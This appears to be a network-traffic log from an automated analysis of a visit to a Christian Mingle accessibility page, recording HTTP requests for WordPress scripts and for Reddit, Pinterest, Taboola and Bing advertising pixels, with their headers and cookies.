Source: global trafficHTTP traffic detected: GET /pixels/a2_fcfvqg5hztts/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/a2_fcfvqg5hztts_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.easypiechart.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6
Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.mobile.custom.min.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/tm-hash.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6
Source: global trafficHTTP traffic detected: GET /ct/lib/main.97c41ef3.js HTTP/1.1Host: s.pinimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1728225781827&id=a2_fcfvqg5hztts&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=e049edff-96bd-4808-a785-abfedcfc59f6&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_5afed25b&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /topics_api HTTP/1.1Host: psb.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Pixels?a_id=19141;cv_1=;cv_2=;cv_3=;cv_4=;rev=;product_id=;p_url=https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F;uq=131791562 HTTP/1.1Host: px.adentifi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/js/min/jquery.magnific-popup.min.js?ver=1.1.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6
Source: global trafficHTTP traffic detected: GET /libtrc/unip/1121901/tfa.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/scripts.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6
Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.closest-descendent.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.reverse.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1
Source: global trafficHTTP traffic detected: GET /p/action/27017382.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.fittext.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1
Source: global trafficHTTP traffic detected: GET /wp-includes/js/hoverIntent.min.js?ver=1.10.2 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/js/theme-script.js?ver=1.2.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/jquery.tm-pb-simple-carousel.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1
Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/a2_fcfvqg5hztts_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixels/a2_fcfvqg5hztts/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1121901/trc/3/json?tim=1728225782020&data=%7B%22id%22%3A276%2C%22ii%22%3A%22%2Fen%2Flegal-en%2Four-commitment-to-accessibility%22%2C%22it%22%3A%22video%22%2C%22sd%22%3Anull%2C%22ui%22%3Anull%2C%22vi%22%3A1728225782001%2C%22cv%22%3A%2220241006-3-RELEASE%22%2C%22uiv%22%3A%22default%22%2C%22u%22%3A%22https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F%22%2C%22e%22%3Anull%2C%22cb%22%3A%22TFASC.trkCallback%22%2C%22qs%22%3A%22%22%2C%22r%22%3A%5B%7B%22li%22%3A%22rbox-tracking%22%2C%22s%22%3A0%2C%22uim%22%3A%22rbox-tracking%3Apub%3Dsparkscusen%3Aabp%3D0%22%2C%22uip%22%3A%22rbox-tracking%22%2C%22orig_uip%22%3A%22rbox-tracking%22%7D%5D%2C%22mpvd%22%3A%7B%22en%22%3A%22page_view%22%2C%22tim%22%3A1728225782019%2C%22ref%22%3Anull%2C%22item-url%22%3A%22https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F%22%2C%22tos%22%3A3%2C%22ssd%22%3A1%2C%22scd%22%3A0%2C%22it%22%3A%22JS_PIXEL%22%2C%22supv%22%3Atrue%7D%2C%22pa%22%3A%7B%22su%22%3Atrue%7D%2C%22psb%22%3Atrue%7D&pubit=i HTTP/1.1Host: trc.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /user/?tid=2612341756004&pd=%7B%22np%22%3A%22gtm%22%7D&cb=1728225782998&dep=2%2CPAGE_LOAD HTTP/1.1Host: ct.pinterest.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /user/?event=pagevisit&ed=%7B%22np%22%3A%22gtm%22%2C%22event_id%22%3A%22e75628eb-50f0-4a64-a25f-6d81889a2f47%22%7D&tid=2612341756004&cb=1728225783003&dep=5%2CEVENT_TAGS_ABSENT HTTP/1.1Host: ct.pinterest.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v3/?tid=2612341756004&pd=%7B%22np%22%3A%22gtm%22%7D&event=init&ad=%7B%22loc%22%3A%22https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F%22%2C%22ref%22%3A%22%22%2C%22if%22%3Afalse%2C%22sh%22%3A1024%2C%22sw%22%3A1280%2C%22mh%22%3A%2297c41ef3%22%2C%22is_eu%22%3Atrue%2C%22architecture%22%3A%22x86%22%2C%22bitness%22%3A%2264%22%2C%22brands%22%3A%5B%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22117%22%7D%2C%7B%22brand%22%3A%22Not%3BA%3DBrand%22%2C%22version%22%3A%228%22%7D%2C%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22117%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0.0%22%2C%22uaFullVersion%22%3A%22117.0.5938.134%22%2C%22ecm_enabled%22%3Atrue%7D&cb=1728225783006 HTTP/1.1Host: ct.pinterest.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAttribution-Reporting-Eligible: not-event-source, trigger=navigation-sourceReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /CookieSyncAdX HTTP/1.1Host: rtb.adentifi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: adtheorent[cuid]=cuid_4ad64c91-83f1-11ef-a6e9-12e1361ed35b
Source: global trafficHTTP traffic detected: GET /ct/lib/main.97c41ef3.js HTTP/1.1Host: s.pinimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/jquery.tm-pb-simple-slider.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1
Source: global trafficHTTP traffic detected: GET /topics_api HTTP/1.1Host: psb.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/tm-hash.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1
